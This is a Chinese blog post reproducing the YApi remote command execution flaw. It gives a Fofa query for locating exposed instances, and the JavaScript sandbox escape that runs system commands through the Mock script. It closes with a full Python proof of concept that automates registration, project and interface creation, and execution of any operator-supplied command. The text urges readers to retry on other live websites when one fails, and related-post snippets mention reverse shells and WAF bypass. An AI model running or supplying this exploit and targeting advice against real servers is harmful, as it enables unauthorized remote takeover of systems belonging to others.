Yapi远程命令执行漏洞复现

最新推荐文章于 2024-06-12 13:46:18 发布
最新推荐文章于 2024-06-12 13:46:18 发布
阅读量1.3k 收藏 2
点赞数
文章标签: yapi 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/126762549
版权

一:简介

Yapi 由 YMFE开源,旨在为开发、产品、测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布、维护API。

二:漏洞复现

步骤一:Fofa搜索一下语句并随便打开一个页面

icon_hash="-715193973"

在这里插入图片描述
在这里插入图片描述
步骤二:点进注册页面填写好注册信息,并登录进去…
在这里插入图片描述
步骤三:点击添加项目并填写好信息进行创建,添加接口并填写相关信息
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述步骤四:创建好接口后进入界面点击高级Mock添加一下代码执行查看内核信息的命令并进行保存…再次点击预览访问Mock地址可查看执行结果。再次判断为Docker环境,无实际可利用位置…

在这里插入图片描述

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("uname -a").toString()

如果出现下图所示就重复步骤一重新找网站重新注册多试几个就好了
在这里插入图片描述
此图为成功样式
在这里插入图片描述

三:POC

import sys
import requests
import random
import urllib3
urllib3.disable_warnings()

"""
    2021-7-9 04:56:36 
    Yapi任意任意命令执行  By j2ekim
    fofa :app="YApi"
    360 :app:"YApi 可视化接口管理平台"
"""

def ram_str(str_num):
    str1 = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
    ran_string = ''

    for i in range(str_num):
        num = random.randint(0, len(str1) - 1)
        ran_string += str1[num]
    return ran_string

reg_mail = ram_str(8) + "@" + ram_str(6) +".com"
reg_username = ram_str(6)
reg_passwd = ram_str(10)
path_name = ram_str(6)


def Yapi_vuln(vul_url,command):
    s = requests.session()

    reg_url = f"{vul_url}api/user/reg"
    # print(reg_url)
    reg_data ={
        "email":f"{reg_mail}","password":f"{reg_passwd}","username":f"{reg_username}"
    }
    reg_user = s.post(url=reg_url,data=reg_data,verify=False)
    if "member" in reg_user.text:
        print(f"注册成功\n"
              f"用户名:{reg_mail}"
              f"密码:{reg_passwd}")
    req_reps=reg_user.json()

    #获取注册用户的uid
    uid = req_reps["data"]["uid"]
    # print(uid)

    # 判断是否登录
    user_info= f"{vul_url}api/user/find?id={uid}"
    get_user_info = s.get(url=user_info)

    # 获取当前用户group_id
    get_user_group_id_url = f"{vul_url}api/group/get_mygroup"
    get_user_group_id =s.get(url=get_user_group_id_url)
    group_id = get_user_group_id.json()["data"]["_id"]

    # 添加项目
    add_project_data = {"name":f"{path_name}","group_id":f"{group_id}","icon":"code-o","color":"green","project_type":"private"}
    add_project_url= f"{vul_url}api/project/add"
    add_project = s.post(url=add_project_url,data=add_project_data,verify=False)
    # print(add_project.json())
    project_id_json=add_project.json()
    project_id=project_id_json["data"]["_id"]


    # 添加接口
    add_interface_url = f"{vul_url}api/interface/add"
    add_interface_data = {"method":"GET","catid":"4987","title":f"{path_name}","path":f'/Yapi_test_{path_name}',"project_id":f"{project_id}"}
    add_interface = s.post(url=add_interface_url,data=add_interface_data,verify=False)

    # # 设置全局变量
    up_project_url = f"{vul_url}api/project/up"
    up_project_data = {"id":f"{project_id}",f"project_mock_script":f"const sandbox = this\nconst ObjectConstructor = this.constructor\nconst FunctionConstructor = ObjectConstructor.constructor\nconst myfun = FunctionConstructor('return process')\nconst process = myfun()\nmockJson = process.mainModule.require(\"child_process\").execSync(\"{command}\").toString()","is_mock_open":"true"}
    up_project = s.post(url=up_project_url,data=up_project_data,verify=False)

    # # 访问漏洞地址
    vuln_add = s.get(url=f"{vul_url}mock/{project_id}/Yapi_test_{path_name}")
    print(vuln_add.text)
    # 保存到文件中
    # with open("YApi.txt",mode="a",encoding="utf-8") as f:
    #     f.write(vul_url)

def reg_status(url):
    try:
        reg_url = f"{url}api/user/status"
        # print(reg_url)
        reps_reg_status = requests.get(url=reg_url,verify=False,headers={"Referer": f"{url}/login"},timeout=5)
        reg_status_json = reps_reg_status.json()
        reg_statu = reg_status_json["canRegister"]
        return reg_statu
    except:
        print("网络连接超时")
        sys.exit()

def main():
    url = input("url:")
    if "http" not in url:
        url= "http://"+ url
    elif url == "":
        sys.exit("未输入网址")
    command = input("command:")
    if command == "":
        print("command不能为空")
        sys.exit("")
    # 判断是否开启注册
    # reg_status()
    site_reg_status = reg_status(url)
    if  site_reg_status == False:
        print("管理员已禁止注册")
        sys.exit()
    else:
        Yapi_vuln(url,command)

if __name__ == '__main__':
    print("""
    ===========================================
        Yapi任意任意命令执行漏洞  By j2ekim
        fofa :app="YApi"
        360 :app:"YApi 可视化接口管理平台"
        url: http://x.x.x.x/
    ===========================================
    """)
    main()
Doxi-13A
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
yapi 代码执行
qq_32445755的博客
07-04 1053
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。因为大量用户使用 YAPI的默认配置并允许从外部网络访问YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。请拿到flag,默认在/tmp/目录中。漏洞复现步骤注册测试账号:注册登录后,创建一个项目,然后选择设置全局的mock脚本点击保存开启添加接口,然后再点击预览可以看到
YApi远程命令执行漏洞分析.pdf
04-22
YApi远程命令执行漏洞分析.pdf
漏洞复现】Yapi接口管理平台RCE漏洞汇总
做自己喜欢的事,并将其发挥到极致!
01-10 5881
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
YAPI远程执行漏洞复现
weixin_46580614的博客
08-02 328
YAPI远程执行漏洞复现 实验靶机 BUUCTF :题目 ezrce 漏洞详情 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令
Yapi代码执行 waf绕过实战记录
最新发布
2401_83799022的博客
06-12 283
这预示着成功了一大步可以初步绕过waf的检测,之后赶紧访问保存的恶意脚本进行反弹 shell 结果 vps 半天没消息,就在怀疑该主机是否不出网的时候被叫吃中午饭了,暂放一阶段。当时,按照复线文章一步一步操作,直到保存脚本时却遇到了问题。的命令和参数是分开的,参考官方文档的参数格式要求再一次修改命令执行脚本,使用nc反弹结果等了个寂寞,后面改成了python反弹命令,保存后访问接口,结果啪的一下很突然,成功收到了反弹连接。查看了浏览器的网络请求状态,发现原来是保存恶意脚本的请求被拒绝了。
漏洞复现----34、yapi 远程命令执行漏洞
七天
06-24 1799
Yapi远程命令执行漏洞
Yapi RCE 复现和批量编写
y0un9er
07-11 921
复现了yapi漏洞的利用方式,并完成脚本编写
七、【漏洞复现】YApi接口管理平台远程代码执行漏洞
weixin_52351575的博客
09-21 381
​YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。3、 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3.新建接口-接口名称随意-接口路径为/随意。
yapi离线安装包及环境
06-26
初始化和配置完成后,执行以下命令启动YAPI: ``` node server.js ``` 如果一切顺利,你应该能在终端看到YAPI成功启动的信息,此时可以通过浏览器访问`http://localhost:3000`来查看和使用YAPI。 8. **注意...
centos系统yapi离线安装包大全
01-24
centos系统yapi离线安装包大全,包含以下文件,已测试安装成功 - node-v12.13.0-linux-x64.tar.xz :nodejs离线...- yapi.tar:yapi执行程序 - pm2.tar.gz:nodejs程序管理工具(可选使用,后台直接启动vue项目也行)
yapi:Docker for YApi 一键部署YApi
05-05
Docker for YApi 一键部署YApi JimCY [me@jinfeijie.cn] :warning:注意 :warning:注意:本仓库目前只支持安装,暂不支持升级,请知晓。如需升级请备份mongoDB内的数据。 使用 默认密码是:ymfe.org,安装成功后进入...
yapi二次开发的详细手册
04-08
yapi二次开发的详细手册主要包含四部分, 1本地yapi的部署,2服务器CentOS系统安装部署Yapi,3接口分类层级的修改,4新模块的增加 用了我一个月的时间梳理,也是不容易,大家如果做yapi的二次开发,可以看看。
[Vulfocus解题系列] yapi 代码执行
00勇士王子的博客
07-18 1011
漏洞介绍 名称: yapi 代码执行 描述: API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。 解题过程 1.打开靶场页面,进入注册页面,随意注册一个用户 2.注册后进入如下页面
YAPI 安全漏洞问题,一文修复全解决
咻咻ing的专栏
08-09 793
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。 目前Yapi在GitHub的关注数有523,Star数21.7k,Fork数3.7k,使用的企业非常广泛,包括阿里巴巴、腾讯、百度、去哪儿等等。 近日,不少用户反映YApi平台存在高危漏洞,攻击者可利用该漏洞在目标服务器上执行任意代码,可
Yapi命令执行漏洞复现
m0_49025459的博客
04-06 204
记得保存,保存键在最下边,然后去访问一下我们的Mock地址。注册一个账户,登录进去,账户随便注册。就能看见我们命令执行的结果了。在代码里添加一串神秘代码。登录进去是下面这个样子滴。点击项目中的添加接口。
漏洞复现之YApi接口管理平台远程代码执行
白帽子九一
05-31 1086
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
漏洞复现-yapi远程执行命令漏洞复现
关注网络安全、云原生安全
07-22 654
YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。这里使用的JayFong的docker-YApiWEB UI在40001端口。启动后发现管理员账号密码不对,应该是环境变量在容器中没有使用,查看配置文件找到管理员账号。网站开放注册功能时可随意注册,设置全局mock脚本可执行任意代码。通过官方文档学习如何新建接口。查看安装脚本,找到密码。
yapi RCE漏洞复现
尐猴子君ii的博客
08-23 1769
前段时间,公司打内部的攻防比赛,然后手里的工作比较忙,时间也比较短,于是就没怎么打。发现了一台主机3000端口开了yapi服务,且能在前台执行命令,但是就是弹不回来shell。有门进不去的感觉就很烦,心痒痒的就想在赛后复盘一下。于是就有这篇文章。 贵有恒,何必三更起五更睡;最无益,只怕一日曝十寒。话不多说,搞快点。 首先面向fofa搜索yapi的资产 找到了个54.xxx的IP,就你了皮卡丘 首先进去,发现注册账户功能是开放的,冲 登录 创建项目 添加接口 执行payload con
YAPI Mock远程代码执行漏洞
qq_17754023的博客
02-28 782
前言 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业使用。 漏洞原理 YAPI项目使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务。其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本
yapi 执行 npm run install-server 报错
04-03
2. 检查你的 package.json 文件,确保你已经正确定义了 "scripts" 字段,并且 "install-server" 命令存在并且可执行。 3. 检查你的依赖项是否正确安装,如果没有,请尝试运行 npm install。 4. 如果你正在使用 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值